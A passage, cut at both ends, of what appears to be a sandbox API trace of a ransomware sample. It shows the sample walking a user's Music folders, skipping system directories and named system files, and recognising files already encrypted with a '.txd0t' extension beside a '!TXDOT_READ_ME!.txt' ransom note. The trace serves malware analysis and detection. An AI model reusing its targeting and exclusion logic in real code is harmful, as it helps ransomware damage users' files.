(lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="ransomware") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\WINDOWS") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.575] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", lpSrch="C:\\Program Files") returned 0x0 [0129.575] GetProcessHeap () returned 0xe30000 [0129.575] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d6) returned 0xed90d0 [0129.575] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0129.576] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\*", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*" [0129.576] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x51ca166c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.576] StrCmpW (psz1=".", psz2=".") returned 0 [0129.576] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa0c2db0, ftCreationTime.dwHighDateTime=0x1d5ef72, ftLastAccessTime.dwLowDateTime=0x51ca166c, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.576] StrCmpW (psz1="..", psz2=".") returned 1 [0129.576] StrCmpW (psz1="..", psz2="..") returned 0 [0129.576] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51c79a1b, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51c79a1b, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51ca166c, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.576] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.576] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.576] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0129.576] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\" [0129.576] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\!TXDOT_READ_ME!.txt" [0129.576] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.576] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.576] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.577] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.577] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a9540, ftCreationTime.dwHighDateTime=0x1d5f045, ftLastAccessTime.dwLowDateTime=0x2c28c420, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x51c79a1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7e45, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="U7kcA.mp3.txd0t", cAlternateFileName="U7KCAM~1.TXD")) returned 1 [0129.577] StrCmpW (psz1="U7kcA.mp3.txd0t", psz2=".") returned 1 [0129.577] StrCmpW (psz1="U7kcA.mp3.txd0t", psz2="..") returned 1 [0129.577] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ" [0129.577] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ", psz2="\\", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\" [0129.577] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\", psz2="U7kcA.mp3.txd0t", cchMax=1110 | out: psz1="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Music\\JI_ROcYP5iaMyIhA11bQ\\U7kcA.mp3.txd0t" [0129.577] PathFindExtensionW (pszPath="U7kcA.mp3.txd0t") returned=".txd0t" [0129.577] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.577] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x900a9540, ftCreationTime.dwHighDateTime=0x1d5f045, ftLastAccessTime.dwLowDateTime=0x2c28c420, ftLastAccessTime.dwHighDateTime=0x1d5e67c, ftLastWriteTime.dwLowDateTime=0x51c79a1b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7e45, dwReserved0=0x590ea7, dwReserved1=0x0, cFileName="U7kcA.mp3.txd0t", cAlternateFileName="U7KCAM~1.TXD")) returned 0 [0129.577] FindClose (in: hFindFile=0xec23f0 | out: hFindFile=0xec23f0) returned 1 [0129.577] GetProcessHeap () returned 0xe30000 [0129.577] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed90d0 | out: hHeap=0xe30000) returned 1 [0129.577] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43d9ce90, ftCreationTime.dwHighDateTime=0x1d5e6e3, ftLastAccessTime.dwLowDateTime=0x9fad7510, ftLastAccessTime.dwHighDateTime=0x1d5e57f, ftLastWriteTime.dwLowDateTime=0x51cc5ebf, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa77f, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="m-T19pWPhwjALOHNq.wav.txd0t", cAlternateFileName="M-T19P~1.TXD")) returned 1 [0129.577] StrCmpW (psz1="m-T19pWPhwjALOHNq.wav.txd0t", psz2=".") returned 1 [0129.577] StrCmpW (psz1="m-T19pWPhwjALOHNq.wav.txd0t", psz2="..") returned 1 [0129.577] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.577] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0129.577] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="m-T19pWPhwjALOHNq.wav.txd0t", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\m-T19pWPhwjALOHNq.wav.txd0t" [0129.577] PathFindExtensionW (pszPath="m-T19pWPhwjALOHNq.wav.txd0t") returned=".txd0t" [0129.577] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.577] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f398 | out: lpFindFileData=0x599f398*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0x51e436ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="rUUROgRx9gfXRUYVye", cAlternateFileName="RUUROG~1")) returned 1 [0129.577] StrCmpW (psz1="rUUROgRx9gfXRUYVye", psz2=".") returned 1 [0129.577] StrCmpW (psz1="rUUROgRx9gfXRUYVye", psz2="..") returned 1 [0129.577] StrCpyNW (in: psz1=0xed39f8, psz2="C:\\Users\\FD1HVy\\Music", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music") returned="C:\\Users\\FD1HVy\\Music" [0129.577] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music", psz2="\\", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\") returned="C:\\Users\\FD1HVy\\Music\\" [0129.577] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\", psz2="rUUROgRx9gfXRUYVye", cchMax=1068 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0129.577] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\system32\\") returned 0x0 [0129.577] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.577] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\system\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\local\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\appdata\\locallow\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\all users\\microsoft\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="\\inetpub\\logs\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\boot\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\perflogs\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\programdata\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\drivers\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\wsus\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\efstmpwp\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch=":\\$recycle.bin\\") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="crypt_detect") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="cryptolocker") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="ransomware") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\WINDOWS") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\Program Files (x86)") returned 0x0 [0129.578] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", lpSrch="C:\\Program Files") returned 0x0 [0129.578] GetProcessHeap () returned 0xe30000 [0129.578] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4d2) returned 0xed90d0 [0129.578] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0129.578] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\*", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*" [0129.578] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\*", lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0x51e436ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec23f0 [0129.578] StrCmpW (psz1=".", psz2=".") returned 0 [0129.578] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7e577330, ftCreationTime.dwHighDateTime=0x1d5e38a, ftLastAccessTime.dwLowDateTime=0x51e436ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51e436ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0129.578] StrCmpW (psz1="..", psz2=".") returned 1 [0129.578] StrCmpW (psz1="..", psz2="..") returned 0 [0129.578] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51cec0b9, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x51cec0b9, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51cec0b9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0129.579] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0129.579] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0129.579] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0129.579] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0129.579] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\!TXDOT_READ_ME!.txt" [0129.579] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0129.579] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0129.579] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0129.579] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2570ee90, ftCreationTime.dwHighDateTime=0x1d5e0dd, ftLastAccessTime.dwLowDateTime=0x10ae3e50, ftLastAccessTime.dwHighDateTime=0x1d5ed57, ftLastWriteTime.dwLowDateTime=0x51cec0b9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x17272, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="ioaNBIFVnbYskp4.wav.txd0t", cAlternateFileName="IOANBI~1.TXD")) returned 1 [0129.579] StrCmpW (psz1="ioaNBIFVnbYskp4.wav.txd0t", psz2=".") returned 1 [0129.579] StrCmpW (psz1="ioaNBIFVnbYskp4.wav.txd0t", psz2="..") returned 1 [0129.579] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0129.579] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0129.579] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="ioaNBIFVnbYskp4.wav.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\ioaNBIFVnbYskp4.wav.txd0t" [0129.579] PathFindExtensionW (pszPath="ioaNBIFVnbYskp4.wav.txd0t") returned=".txd0t" [0129.579] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.579] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7c40f90, ftCreationTime.dwHighDateTime=0x1d5e3d2, ftLastAccessTime.dwLowDateTime=0x23cb1ad0, ftLastAccessTime.dwHighDateTime=0x1d5e41f, ftLastWriteTime.dwLowDateTime=0x51d123e3, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x4a4c, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", cAlternateFileName="MO9AZN~1.TXD")) returned 1 [0129.579] StrCmpW (psz1="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", psz2=".") returned 1 [0129.579] StrCmpW (psz1="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", psz2="..") returned 1 [0129.579] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0129.579] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0129.579] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="Mo9aZN_6Jq9VyBd _y.m4a.txd0t", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\Mo9aZN_6Jq9VyBd _y.m4a.txd0t" [0129.579] PathFindExtensionW (pszPath="Mo9aZN_6Jq9VyBd _y.m4a.txd0t") returned=".txd0t" [0129.580] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0129.580] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x599f0e8 | out: lpFindFileData=0x599f0e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbe9605a0, ftCreationTime.dwHighDateTime=0x1d5eda4, ftLastAccessTime.dwLowDateTime=0x51dd0f7a, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x51dd0f7a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5c0741, dwReserved1=0x0, cFileName="VdR6kOMbj3V3xP", cAlternateFileName="VDR6KO~1")) returned 1 [0129.580] StrCmpW (psz1="VdR6kOMbj3V3xP", psz2=".") returned 1 [0129.580] StrCmpW (psz1="VdR6kOMbj3V3xP", psz2="..") returned 1 [0129.580] StrCpyNW (in: psz1=0xed90d0, psz2="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye" [0129.580] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye", psz2="\\", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\" [0129.580] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\", psz2="VdR6kOMbj3V3xP", cchMax=1106 | out: psz1="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP") returned="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP" [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\system32\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\syswow64\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\system\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\windows\\winsxs\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\roaming\\") returned 0x0 [0129.580] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\rUUROgRx9gfXRUYVye\\VdR6kOMbj3V3xP", lpSrch="\\appdata\\local\\") returned 0x0 [0129.580] StrStrIW 